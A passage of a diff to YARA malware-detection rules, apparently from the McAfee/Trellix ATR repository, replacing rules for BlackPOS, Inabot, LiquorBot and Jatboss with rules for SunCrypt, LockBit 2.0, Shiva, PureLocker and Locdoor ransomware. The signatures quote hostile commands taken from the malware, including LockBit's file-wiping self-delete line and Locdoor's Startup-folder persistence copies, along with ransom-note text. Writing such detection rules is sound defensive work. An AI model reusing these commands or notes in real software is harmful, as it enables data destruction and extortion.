?4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? } condition: - uint16(0)==0x5a4d and filesize <500KB and any of them + uint16(0)==0x6441 and all of them } -rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE +rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE { meta: - description = "BlackPOS PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "f37e1522-49c4-5369-bc2c-33b070e9eae7" - date = "2014-01-24" - modified = "2020-08-14" - reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_blackpos_pdb.yar#L1-L25" + description = "Rule to detect SunCrypt ransomware decryptor" + author = "McAfee ATR Team" + id = "ec0d3811-6083-5537-bf29-32ee02d43b5e" + date = "2020-10-02" + modified = "2020-11-02" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Suncrypt.yar#L27-L50" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf" - logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9" + logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1" score = 75 quality = 70 - tags = "POS, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "pos" - malware_family = "Pos:W32/BlackPos" + malware_type = "ransomware" + malware_family = "Ransomware:W32/Suncrypt" actor_type = "Cybercrime" actor_group = "Unknown" + hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310" strings: - $pdb = "\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb" + $pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 } condition: - uint16(0)==0x5a4d and filesize <300KB and any of them + uint16(0)==0x5a4d and filesize <400KB and all of them } -rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE +rule TRELLIX_ARC_Lockbit2_Jul21 : FILE { meta: - description = "Rule to detect inabot worm based on PDB" + description = "simple rule to detect latest Lockbit ransomware Jul 2021" + author = "CB @ ATR" + id = "22b423df-ae5c-5672-95be-333b13791fc6" + date = "2021-07-28" + modified = "2021-07-28" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Lockbit2.yar#L1-L25" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159" + score = 50 + quality = 70 + tags = "FILE" + version = "v1" + hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202" + hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d" + + strings: + $seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide + $seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide + $p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide + $p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide + $p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide + $p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide + $p5 = "https://tox.chat/download.html" fullword wide + $p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide + $p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide + $p8 = "\\LockBit_Ransomware.hta" fullword wide + + condition: + ( uint16(0)==0x5a4d and filesize <1000KB and (1 of ($seq*) and 4 of them )) or ( all of them ) +} +rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE +{ + meta: + description = "Rule to detect an unpacked sample of Shiva ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "b899d2d6-000a-5363-9efe-527dcd0cea17" - date = "2013-04-19" + id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d" + date = "2018-09-05" modified = "2020-08-14" - reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_inabot_worm_pdb.yar#L1-L25" + reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Shiva.yar#L1-L37" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa" - logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0" + hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d" + logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f" score = 75 - quality = 70 - tags = "WORM, FILE" + quality = 66 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "worm" - malware_family = "Worm:W32/Inabot" + malware_type = "ransomware" + malware_family = "Ransom:W32/Shiva" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\trasser\\portland.pdb" - $pdb1 = "\\mainstream\\archive.pdb" + $s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii + $s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide + $s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide + $s4 = "write.php?info=" fullword wide + $s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide + $s6 = " * Do not rename encrypted files." fullword wide + $s7 = ".compositiontemplate" fullword wide + $s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide + $s9 = "\\READ_IT.txt" fullword wide + $s10 = ".lastlogin" fullword wide + $s11 = ".logonxp" fullword wide + $s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide + $s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide condition: - uint16(0)==0x5a4d and filesize <180KB and any of them + ( uint16(0)==0x5a4d and filesize <800KB) and all of them } -rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE +rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect LiquorBot malware" + description = "Rule to detect PureLocker ransomware based on binary sequences" author = "Marc Rivero | McAfee ATR Team" - id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5" - date = "2020-08-19" - modified = "2020-08-19" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_liquorbot.yar#L1-L23" + id = "3d945869-9faa-59de-add6-d664a7beef6f" + date = "2019-11-13" + modified = "2020-08-14" + reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_PureLocker.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89" + logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea" score = 75 quality = 70 - tags = "MALWARE, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "malware" - malware_family = "Botnet:W32/LiquorBot" + malware_type = "ransomware" + malware_family = "Ransom:W32/PureLocker" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9" strings: - $pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF } + $sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? } condition: - uint16(0)==0x457f and all of them + uint16(0)==0x5a4d and filesize <300KB and all of them } -rule TRELLIX_ARC_Jatboss : PHISHING FILE +rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents" + description = "Rule to detect Locdoor/DryCry" author = "Marc Rivero | McAfee ATR Team" - id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85" - date = "2019-12-04" + id = "d855d7fd-a1e3-561e-906e-103752285b0f" + date = "2018-09-02" modified = "2020-08-14" - reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_jatboss.yar#L1-L36" + reference = "https://twitter.com/leotpsc/status/1036180615744376832" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_locdoor.yar#L1-L32" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb" - logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc" + hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41" + logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c" score = 75 - quality = 66 - tags = "PHISHING, FILE" + quality = 70 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "phishing" - malware_family = "Phishing:W32/Jatboss" + malware_type = "ransomware" + malware_family = "Ransom:W32/Locdoor" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 } - $jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 } - $spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 } + $s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii + $s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii + $s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii + $s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii + $s5 = "! Your computer's important files have been encrypted! " fullword ascii + $s7 = "This program is not supported on your operating system." fullword ascii + $s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" 